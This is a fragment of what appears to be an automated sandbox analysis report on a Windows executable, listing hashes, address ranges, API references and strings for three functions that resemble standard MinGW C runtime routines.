• Opcode Fuzzy Hash: 23b68bb42b0f82039d4d5f8cf07ce6922b44f5be1f238decd1318aa66a56883f
• Instruction Fuzzy Hash: 6621E0B1715A0292FA5BEB53F9483E923A0B76CBD0F444021FB1E576B4DB7A8986C300

Control-flow Graph
• Graph rendering not preserved; basic blocks span 140001880-140001b98, call the internal routines at 140002420, 140002660, 140001ba0 and 140001d40, and reference VirtualProtect
APIs
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
Similarity
• API ID: ProtectVirtual
• String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
• API String ID: 544645111-395989641
• Opcode ID: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
• Instruction ID: bed1886f8e7b3562c786f91e2c2504e2a336d35a61311b426e06807153cec951
• Opcode Fuzzy Hash: a6faf70e8b190511a78e30de1eab31b3fdd89b936d163022cdfacdbb5805c305
• Instruction Fuzzy Hash: 415114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

Control-flow Graph
• Graph rendering not preserved; basic blocks span 140001800-140001867, call the internal routine at 140002290 and reference fprintf
Similarity
• API ID: fprintf
• String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
• API String ID: 383729395-3474627141
• Opcode ID: 06706ce423c9832590b29c5c53e3169b3bae122df3cd879a1f71e2df78fcb1e5
• Instruction ID: aea915e8a655bba8c591452d7e1c454b8f05ed4898291b50efe42234b691c12b
• Opcode Fuzzy Hash: 06706ce423c9832590b29c5c53e3169b3bae122df3cd879a1f71e2df78fcb1e5
• Instruction Fuzzy Hash: DCF0F671A04A8482E212EF2AB9413ED6360E75D3C1F50D211FF4D532A1DF3CD182C310

Control-flow Graph
• Graph rendering not preserved; basic blocks span 14000219e-140002280 and reference EnterCriticalSection, LeaveCriticalSection, TlsGetValue and GetLastError
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveValue
• String ID:
• API String ID: 682475483-0
• Opcode ID: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
• Instruction ID: 8e08899b71d5d6c295770fc95a4fa8b22c720a8a39741bac27afb53efd3d8dea
• Opcode Fuzzy Hash: ef714723185b3a8d2aed80037f9450dbdc245cd35eb766ee46406a0163f8cc51
• Instruction Fuzzy Hash: C201B2B5705A0192FA5BDB53FE083E86360B76CBD1F454061EF0957AB4DF79C996C200